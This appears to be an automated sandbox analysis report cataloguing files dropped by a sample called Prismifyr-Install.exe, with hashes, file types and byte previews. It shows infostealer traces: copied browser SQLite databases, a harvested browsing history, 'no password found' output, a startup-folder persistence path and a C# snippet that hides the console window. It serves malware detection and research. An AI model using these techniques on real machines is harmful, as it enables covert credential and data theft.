                                                                                                                                                                                                                                    SHA-512:86507915A541D3ECE8DA3B7DBBC6FB99F64853FA1460698EFF6B14322B2D904DD7B889F09C04DE1E12DCEAA1D59E70D94638173806F23D9F21850EA94152D484
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Preview:no cards found
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1809
                                                                                                                                                                                                                                    Entropy (8bit):5.249407927208099
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:i8Mcew2AJkcdVcDcVcQH1kcNAkh+cKAkh+cruA:i85ew2AJxdGQGIl/w/6A
                                                                                                                                                                                                                                    MD5:F8261BD0635FD090111553F99872232A
                                                                                                                                                                                                                                    SHA1:48CD5596ACD7FB796812B0C5223D83244DF09943
                                                                                                                                                                                                                                    SHA-256:B3068B3B63A846E9AF7BC069F2E3C6BE5CA28E8676DADED72C194F8546C23B2B
                                                                                                                                                                                                                                    SHA-512:E7A7CAF4BD707EDABEAA42973A9EB372DB5C81E23A6A5042F0973EB816F48A6D4FBE454845B3D90AB5EEC9CA1645204E305744A5973E1A7D76E56083BC5364D9
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:================.URL: https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_medium=et.Title: Google Chrome - The Fast & Secure Web Browser Built to be Yours.Last Visit Time: 13369750743103180.Application: Google Default.================.URL: https://www.google.com/search?q=eicar+test+file&oq=eicar+test+file&aqs=chrome..69i57j0i512l9.2756j0j4&sourceid=chrome&ie=UTF-8.Title: eicar test file - Google Search.Last Visit Time: 13335742402166306.Application: Google Default.================.URL: https://www.eicar.org/download-anti-malware-testfile/.Title: Download Anti Malware Testfile . Eicar.Last Visit Time: 13335742418083048.Application: Google Default.================.URL: https://secure.eicar.org/eicar.com.Title: .Last Visit Time: 13335742408142492.Application: Google Default.================.URL: https://secure.eicar.org/eicar.com.txt.Title: .Last Visit Time: 13335742414655748.Application: Google Default.================.URL: https://www.go
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):22
                                                                                                                                                                                                                                    Entropy (8bit):3.2776134368191157
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:SWSKXB5LQ:lSKXvLQ
                                                                                                                                                                                                                                    MD5:1B62F8861D5FB6932E6BC28C2D629F80
                                                                                                                                                                                                                                    SHA1:8A35DBA7006B138C1EA87918A2373A52462FAE0D
                                                                                                                                                                                                                                    SHA-256:EC4181FA4DA153D819F2850B51A5697D1B68BB0FE005047897F911D7B0F1CDA3
                                                                                                                                                                                                                                    SHA-512:CE42BFC0DAFC54FD63A4A3F8DED46917D4D37E77E469A2E3D1F8D2EB8B2406CAD7E7FECEF7E40A39C143F323F9E8C8E28E12306485248E4040FA0D877BFFB9F3
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Preview:no password found for
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 1920 x 1080, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1265733
                                                                                                                                                                                                                                    Entropy (8bit):7.952250651915573
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:1wi1Kv/Lm9t8jXgwKdW4d1itUdFvhUsXTRSZJ92b6MgIJUjkeN6Bz+T1o:B1KvMYKdYaXcnkb6MXJUjkYwCho
                                                                                                                                                                                                                                    MD5:908D34BEA622177DCF1E138E9209ACFB
                                                                                                                                                                                                                                    SHA1:38259D394B2E5C28650ACD025F1041CEFE8C8FAD
                                                                                                                                                                                                                                    SHA-256:64558267B65BB90E08A1994D7825746D66D786E12A39847A62C50CA43E9125B5
                                                                                                                                                                                                                                    SHA-512:FA513FC8324211556B0AB16C890F3042F85CFE6867B3397A30FA2BE07CD95C5972736EB13EBC48562CC0964575451156B69C239DC326105F3ACF9CEAE6826BB7
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR.......8........C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..g...u..Vw....;?.tc..bwf...Xz...{.I...=)C...5.3#......J.V... ....'hA.:.....|.............Df.<.oVu}XM<{..t>.h3...|8.xb8g=..!.~F0..g..L.B...qv.q.._....'..3s....;.W.O6.X{.v.}...s.n..T3w..l.M...X..>Z..1...y.../.03..3.>..~....$;.8d{f..\....3..N.f......x...6.....w?.........-+..03.*..2...O.2.7.,........e....4Uf.[9..:.Y.0.W.\...e.).....bv.....+.?.A._.x^...:....8f>...t..{i<2j.....?z`B.3.3...E...oUbl...;...\...............s'.`...9.qr3f......{....{.2../..{...s....w~..wt...d.._MY...c.m.1../O..o...o}i.s#.}........{....}.*..lg.x_..c.....t^.Oe....{..o(.x}.-.Q.]..6.....~w....x.{+.....!V.~;.x...s...C.{.]....N......;....[0.fO......}..y.;....|{...{+..N...T....om.Z..`....j.....c.B..1........=.f..6.O..B............].5'..pke...*3..R..\>.q7.y.N)..q..y.;..f..5..w..5'....{C..|w...K..'.....S3{.u~..4k.+....753G.X[..O*.>...s..M.....'.g..o.s.K.\Y.kX[X{...:.(-.
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3045002, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                    Entropy (8bit):1.4026573159402624
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:TB9aw/aHLopFMavU1/iB8eVC+rQ88TkQqp8JHyDlEKw0esEieNp:1PareMa8K8eVC+rZ8TkQqpWSDlNufp
                                                                                                                                                                                                                                    MD5:F49DFF163167A43F4940B7337A092C07
                                                                                                                                                                                                                                    SHA1:1A8BAAC92537FA0BD39063D17C3072AD86190CC4
                                                                                                                                                                                                                                    SHA-256:B3D38278030DBEA9D1CDDC177F9B6CB590CE1D383A88211B231402B7CA208CF3
                                                                                                                                                                                                                                    SHA-512:BC7685763D70300FE2AE28803D9F886D91004F6045A995065FAAEB6A9DFCAB77E80B475516E9B4C1F8969E112E2B48C7E68FC2AB15F61BB69443A8C54E24066F
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................v.......@..g.....@....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):135168
                                                                                                                                                                                                                                    Entropy (8bit):1.0873605234887023
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
                                                                                                                                                                                                                                    MD5:5B01CD9FA62FDF35D1A4587F2676CA31
                                                                                                                                                                                                                                    SHA1:25BBFAC890114F4ECE0BF818F504FFE6102004B8
                                                                                                                                                                                                                                    SHA-256:74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
                                                                                                                                                                                                                                    SHA-512:A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3045002, file counter 21, database pages 54, 1st free page 10, free pages 14, cookie 0x50, schema 4, UTF-8, version-valid-for 21
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):229376
                                                                                                                                                                                                                                    Entropy (8bit):0.8702785449902919
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:384:u0ATqjAfepy42PWoo/oftTBBE3utC7UqrDvQoJMAa:rATq8feA42PWoo/oftTBBjuUVAa
                                                                                                                                                                                                                                    MD5:E782D8B6164B8CF64500A01B85E5FD38
                                                                                                                                                                                                                                    SHA1:C9D4CEAAE1A4FA6E8E74281520262B9ABCA02E18
                                                                                                                                                                                                                                    SHA-256:E42275C994991D8927C6FAAF7F38E394FFC080CAB5AE61136343DA5686C9B99F
                                                                                                                                                                                                                                    SHA-512:1C0D174F9CF3B0AC3331013C7E9E45B5646BECF11617E635E20370E4C9289D529CE922DF9719BC3354D0B78DD2AB990AC9DE81908E5D8F799386CF3936DE340A
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......6...........P......................................................v.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 4, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):49152
                                                                                                                                                                                                                                    Entropy (8bit):0.86528072116055
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:96:kTN7KLWlGxdKmtZeympbn8MouB6w9f/rrGMa:qVlGxdKN7Iw9fj
                                                                                                                                                                                                                                    MD5:8CC409C8658C3F05143C1484A1719879
                                                                                                                                                                                                                                    SHA1:909CDE14664C0E5F943764895E0A9DFEC7831FF5
                                                                                                                                                                                                                                    SHA-256:BC69C3518DA2ABC8904F314F078D9672BAF3B840E09FD2B2E95D4B07A03A85A4
                                                                                                                                                                                                                                    SHA-512:55D8923B6481ADF442817B7BAA50C36CBAD8DAC0EC600451813D29F4775DE519A06158A6233E61635CD0ED862E60AC7F50C75556C4E89D583D8A8A4299F1808F
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................v.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):135168
                                                                                                                                                                                                                                    Entropy (8bit):1.0873605234887023
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
                                                                                                                                                                                                                                    MD5:5B01CD9FA62FDF35D1A4587F2676CA31
                                                                                                                                                                                                                                    SHA1:25BBFAC890114F4ECE0BF818F504FFE6102004B8
                                                                                                                                                                                                                                    SHA-256:74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
                                                                                                                                                                                                                                    SHA-512:A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe
                                                                                                                                                                                                                                    File Type:CSV text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):862
                                                                                                                                                                                                                                    Entropy (8bit):5.396401152348592
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:ML9E4Ka11qE4Gv3QqCKDE4KGKMAKh6+84xpcT:MxHKo1qHGv3QqCYHKG1Ao6+vxpcT
                                                                                                                                                                                                                                    MD5:E5682AC2353F7EF62B601A10955E717D
                                                                                                                                                                                                                                    SHA1:28EFF2E0B48F312479E27F2CC34CD149A24DCC71
                                                                                                                                                                                                                                    SHA-256:141D47B1C303431C063449F93E86899C3FC45100EE47F8B97495D97D32592A8D
                                                                                                                                                                                                                                    SHA-512:B67D107060A3C24CC46E0D72BA709B64F31D6DA3C65AAB2C1D7E1244D140312F0E57587281E595DABD7BDCD5B64C1F2A7C16BB0FE9276B321CC2A8701643586D
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d1b08a492d712e019f310913d82efb4d\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\4dac268a38ead99f93898a086bb8c6f6\System.Drawing.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\782dd7dd89e97af687ff0bdfb301ea5f\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\d168bb79d8c202ee2de4b8f1cab215dd\Microsoft.VisualBasic.ni.dll",0..
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):122880
                                                                                                                                                                                                                                    Entropy (8bit):1.1414673161713362
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                                                                                                                                                                                                                    MD5:24937DB267D854F3EF5453E2E54EA21B
                                                                                                                                                                                                                                    SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                                                                                                                                                                                                                    SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                                                                                                                                                                                                                    SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3036000, file counter 4, database pages 35, cookie 0x1e, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):163840
                                                                                                                                                                                                                                    Entropy (8bit):0.44975538801868414
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:96:Ou1HAU+bDoYysX0uhnyZtha58VjN9DLjGQLBE3u:Ou1X+bDo3irhnyBi8Vj3XBBE3u
                                                                                                                                                                                                                                    MD5:89E4498D0328AFC71113CC75EBE7D770
                                                                                                                                                                                                                                    SHA1:120CF58C897FF1025F8B4F854A21821D948F74BC
                                                                                                                                                                                                                                    SHA-256:F50B271AFE0D4950FAE539E4A04C3D07849F0CE2250E73B352CDB3D981095B40
                                                                                                                                                                                                                                    SHA-512:7914EDF9352FBB1ABB6A0B89A4F47F09DE5672DEB6B4BE9EBEA833C8D1ED3EFD5AD16A612DF3DF65C878EB577FD0B697BC44C3E52D9BBFB82A81C1C903621989
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......#..................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 3, database pages 27, 1st free page 7, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):57344
                                                                                                                                                                                                                                    Entropy (8bit):0.7310370201569906
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:96:qsvKLyeymO9K3PlGNxotxPUCbn8MouON3n:q86PlGNxss27e
                                                                                                                                                                                                                                    MD5:A802F475CA2D00B16F45FEA728F2247C
                                                                                                                                                                                                                                    SHA1:AF57C02DA108CFA0D7323252126CC87D7B608786
                                                                                                                                                                                                                                    SHA-256:156ADDC0B949718CF518720E5774557B134CCF769A15E0413ABC257C80E58684
                                                                                                                                                                                                                                    SHA-512:275704B399A1C236C730F4702B57320BD7F034DC234B7A820452F8C650334233BD6830798446664F133BA4C77AA2F91E66E901CE8A11BD8575C2CD08AB9BE98F
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):122880
                                                                                                                                                                                                                                    Entropy (8bit):1.1414673161713362
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                                                                                                                                                                                                                    MD5:24937DB267D854F3EF5453E2E54EA21B
                                                                                                                                                                                                                                    SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                                                                                                                                                                                                                    SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                                                                                                                                                                                                                    SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1148
                                                                                                                                                                                                                                    Entropy (8bit):5.324444617892754
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:3ZCl1SGfbo4KMjKbmSoas4RPT6moUP7m9qr9t7J0gt/NKIl9r8Hq:Yl1SGfs4/ymTx4RfoUP7m9qr9tK8NDd
                                                                                                                                                                                                                                    MD5:DF31BE2E36FFDEE1DD8ACED2511E74CC
                                                                                                                                                                                                                                    SHA1:157B129EB2ECFD1759F3F2C67C7C5E35023AC8BD
                                                                                                                                                                                                                                    SHA-256:1B9B88C3775EF6DC898A562DA5B4EAC48023460B7F176C2C3D85D1867064F9AF
                                                                                                                                                                                                                                    SHA-512:751B56DFC4E1BBAA9393A595202266216F425787BF9A36E86D931F898460C636500D0305D495D312350FC88DC8EE43635F08ABB8F3BFEC17FF127E081FCFD7E4
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:@...e................................................@..........8...................=.@G..?...o.........System.Security.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0...............I.....B..ZR............System..4......................A....E..........System.Core.D................g$H..K..I.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4...............F;7..C..f.G..........System.Data.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D.......
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):312
                                                                                                                                                                                                                                    Entropy (8bit):4.810180533274889
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6:V/DsYLDS81zu+VMOhMLL+iNFs2SRaiP2hM/siNFs2SRkoSoODxLhy:V/DTLDfugMa7I9Ox1y
                                                                                                                                                                                                                                    MD5:ECBF151F81FF98F7DFF196304A40239E
                                                                                                                                                                                                                                    SHA1:CCF6B97B6F8276656B042D64F0595963FE9EC79C
                                                                                                                                                                                                                                    SHA-256:295CA195631C485C876E7C468DDCBB3FE7CD219D3E5005A2441BE2DE54E62AC8
                                                                                                                                                                                                                                    SHA-512:4526A59055A18AF6C0C13FB9F55A9A9BC15AA1407B697849E19B6CC32C88EE7206B3EFFF806BD154D36BCE144AE1D9C407C6EA0F5077C54FBE92CD172C203720
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.using System;.using System.Runtime.InteropServices;..namespace Console.{. public class Window. {. . [DllImport("Kernel32.dll")]. public static extern IntPtr GetConsoleWindow();.. [DllImport("user32.dll")]. public static extern bool ShowWindow(IntPtr hWnd, Int32 nCmdShow);. .. }..}.
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):371
                                                                                                                                                                                                                                    Entropy (8bit):5.304870557110998
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CN23fe0BTozxs7+AEszICN23fe0BTl:p37Lvkmb6Km1ToWZE71Tl
                                                                                                                                                                                                                                    MD5:0E4BD4BC3F70BDEF3095CEAE73005A15
                                                                                                                                                                                                                                    SHA1:676D26B0E7BE6DB7466D21FCFEE8DB4A78EA99A0
                                                                                                                                                                                                                                    SHA-256:D8D64F5EDAA394709D310D1B3370FBD1BA9DDB1BD538018782D107B62C71822A
                                                                                                                                                                                                                                    SHA-512:6D07C2F843BEBB2DD80E877A80F593BF2E804E1A2B5E634E2F73E5E65B7AC37728F6378A58995DC0E16275AF902FB6224C0EE8DEF9857D809484BE69EAFF501A
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\1d1qdkxo\1d1qdkxo.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\1d1qdkxo\1d1qdkxo.0.cs"
                                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):3072
                                                                                                                                                                                                                                    Entropy (8bit):2.846713596332181
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:etGShepeYYqql78G7v/9ZetkZfp95IRFWI+ycuZhN3akSJPNnq:6h9YSlIqvFZRJp96K1ul3a3rq
                                                                                                                                                                                                                                    MD5:63FC741ACDEE5814967427BCD55F628B
                                                                                                                                                                                                                                    SHA1:5DE9F2DD1612E59A0F05B6A0FC0CCB78EB554569
                                                                                                                                                                                                                                    SHA-256:0CE4BED44E212150F3C01A740908AB6141520856E1047A35967047B4E44C6796
                                                                                                                                                                                                                                    SHA-512:060FAAC89FEC0E988F22F71865EF8D2EFBEB9C11A6815904E42BFDFBD213C55C6C6104704CBACE02FC2C88644AC7BEE99D3A937CF0B1824FC0C196378596030A
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....!.f...........!.................#... ...@....... ....................................@.................................d#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~...... ...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................6./.....m.....m.......................................... =............ N.....P ......Y........._.....d...Y.....Y...!.Y.....Y.......".....+.........=.......N.......................................&........<Module
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (451), with CRLF, CR line terminators
                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                    Size (bytes):872
                                                                                                                                                                                                                                    Entropy (8bit):5.349050362821302
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:KSId3ka6Km1FE71EKax5DqBVKVrdFAMBJTH:dkka6PXE7aK2DcVKdBJj
                                                                                                                                                                                                                                    MD5:2F610261FBBCFD6F503FBCB817F1BB88
                                                                                                                                                                                                                                    SHA1:C5DDF386F88246A6D449E8453960363D97534614
                                                                                                                                                                                                                                    SHA-256:A3F98E3DC71ED1E0AC398738F91028B979214949074C7A28FCA8D625DAC3ED1E
                                                                                                                                                                                                                                    SHA-512:64A341B5D3A3C7FF7BD37F03DDB8463954AEDB8081892500719E870A967029406C659FB2226FFCD02B2E386973B75EE042BD3FB956A4DFB062115E1A86E81C90
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\1d1qdkxo\1d1qdkxo.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\1d1qdkxo\1d1qdkxo.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                    File Type:MSVC .res
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):652
                                                                                                                                                                                                                                    Entropy (8bit):3.116950377548936
                                                                                                                                                                                                                                    Encrypted:false
